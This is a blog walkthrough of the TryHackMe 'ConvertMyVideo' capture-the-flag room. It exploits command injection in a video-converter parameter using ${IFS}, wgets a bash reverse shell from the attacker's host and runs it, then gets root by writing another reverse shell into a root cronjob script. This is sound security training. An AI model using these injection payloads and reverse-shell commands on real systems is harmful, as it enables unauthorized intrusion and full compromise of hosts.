# TryHackMe: ConvertMyVideo

Link to Lab - [https://tryhackme.com/room/convertmyvideo](https://tryhackme.com/room/convertmyvideo)

**Lab Overview** - My script to convert videos to MP3 is super secure.

A perfect room to understand from basic enumeration to limiting findings abusing a single found web application functionality trying to execute command injection using IFS and getting low privilege shell to further abusing cronjob to becoming a root.

### **TASK1  :  Recon**

We will run an Nmap aggressive scan against our target.

`nmap -A -sV 10.10.163.162 -v`

Here is our Nmap result, where we can find 2 ports (22 and 80) as open to SSH. Since we need credentials, let’s go with port 80.

While opening the URL: http://10.10.163.162 in the browser, we found a webpage where we can convert our videos.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254443187/798b61f2-b3d4-4515-b3f2-473ebdbba31a.png align="left")

Convert My Video

Let’s give some input and check what it does.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254444863/6ed82220-125b-4da3-8e44-c55f3d957b9e.png align="left")

We don’t clearly understand what it’s trying to do and why we are getting such an error.

So our next step will be enumerating further.

### **TASK2  :  Enumerating**

For this task, we will capture this request and response in BURP.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254447110/ef159d5a-6d77-4ca3-8db5-a1ee8bf5e379.png align="left")

So let’s try command injection in the *yt\_url* parameter.

`yt_url = ls`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254449364/b8ec9c07-bc96-43eb-9d11-dbdeeba14a92.png align="left")

As we can see, it uses YouTube-DL software. Let's enumerate this.

`youtube-dl` is a command-line program to download videos from [YouTube](http://YouTube.com) and a few other sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and is not platform-specific. It should work on your Unix box, on Windows, or on macOS. It is released to the public domain, which means you can modify it, redistribute it, or use it however you like.

We get a sort of command injection here.

`yt_url = ls`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254450761/d3c1e8a3-975e-4e18-a33b-33561aa40d83.png align="left")

At this point, we start struggling with which command to run, as commands with spaces are not allowed.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254452392/a65ff2c4-1999-4018-834b-297fca40d1e2.png align="left")

After a bit of googling, we found something called IFS. It is a special shell variable, it stands for Internal Field Separator.

`` yt_url=`ls${IFS}-la` ``

Using this, we are getting a response. At least the command is being executed on the server.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254455037/b3ee8940-b334-4adc-986b-b424f13be40c.png align="left")

On multiple retries and failures, we found something interesting.

### **TASK3 : Exploitation**

So we search for a one-liner reverse shell in bash.

`bash -i >& /dev/tcp/10.11.48.237/9090 0>&1`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254456447/f288b0c6-6123-4031-94d1-d8299d2a8a71.png align="left")

Now we have to send this to the victim. I am hosting this payload using an HTTP server.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254458637/db26f1a3-f1b1-4b5e-8a70-2542136257dc.png align="left")

Using wget, we will try to download this payload on the victim machine. Then, we will execute it.

`wget${IFS}http://10.11.48.237/rev.sh`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254460772/53f64694-33da-4794-89e4-0389fdd23a79.png align="left")

We will provide the execution permission to the payload and try to run it.

`` `chmod${IFS}777${IFS}rev.sh` ``

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254463269/965a9a7e-f612-495c-b53c-3644fa33c51f.png align="left")

Let's start a listener on port 9090 as per our reverse shell payload and run this.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254465111/334e14e1-cc09-43f1-9695-6678edc00b79.png align="left")

`` `bash${IFS}rev.sh` ``

**BOOM!!!!!!!!!!! We got our low-level shell.**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254467131/fe2633c6-197c-4aad-927c-f253d780f54e.png align="left")

### **TASK4 : Privilege Escalation**

Let's check the crontabs for any scheduled tasks executed by the root user.

`Crontab -l`

`cat /etc/crontab`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254468647/606123e2-048c-49db-82e5-b105bddf2532.png align="left")

`ps aux`

Check the running process, as in the above approach we haven’t found anything juicy.

We found a cronjob being executed as a root user.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254470978/ad3febc1-a9d9-4274-9087-863d4447aadb.png align="left")

We can automate this process using [linpeas.sh](http://linpeas.sh) or [linenum.sh](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh) which will highlight such interesting cronjobs in red.

We found a very interesting tool, [pspy](https://github.com/DominicBreuker/pspy), to look into the Linux process.

`pspy` is a command-line tool designed to snoop on processes without needing root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs.

Also great to demonstrate to your colleagues why passing secrets as arguments on the command line is a bad idea.

The tool gathers the info from procfs scans. I notify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

We have downloaded this tool on the attacker machine and will send it to the victim the way we shared *rev.sh*

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254472482/25d3cdc3-9a1b-4ae9-bdf8-c5be6a88c862.png align="left")

`wget http://10.11.48.237:8080/pspy64`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254473721/1de2de12-6bad-4198-9748-3bd5b71549ad.png align="left")

Provide the required permission to execute it.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254475334/f406941b-6d89-496e-a27a-5b8bce886a98.png align="left")

It might take 2–3 minutes to complete this job.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254477944/bc190ae8-461c-4260-89ea-79013bcfcc2f.png align="left")

Ok, so we found a process running as *clean.sh*. It is also running as a CRONJOB. Is this Cronjob overwriting? Let's give this a try.

Navigate to `/var/www/html/tmp/clean.sh` and check what it's doing.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254479544/984eb9c0-d252-4723-ab3c-cd37d87008d4.png align="left")

Modify our 1 liner and integrate it into this file.

`bash -i >& /dev/tcp/10.11.48.237/5555 0>&1`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254480756/b0c86529-3a37-4227-89df-d6bea53ce5ec.png align="left")

And we are root

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254482082/b990caaa-cec3-4f0b-9b68-f282332c1d94.png align="left")

### **TASK5 :  Capture the Flags**

**What is the name of the secret folder?**

Admin

**What is the user to access the secret folder?**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254484331/baba6ecc-df45-46d2-b701-485574570637.png align="left")

**What is the user flag?**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254485869/4bf0474e-6f8e-4e54-a899-a9657961f0df.png align="left")

**What is the root flag?**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1694254487316/6938d449-a4f8-4a72-a43a-a3b01d09f8ae.png align="left")

*Thank you for reading this blog. While attempting this challenge, I learnt so many things. This was a unique target with a unique vulnerability.*
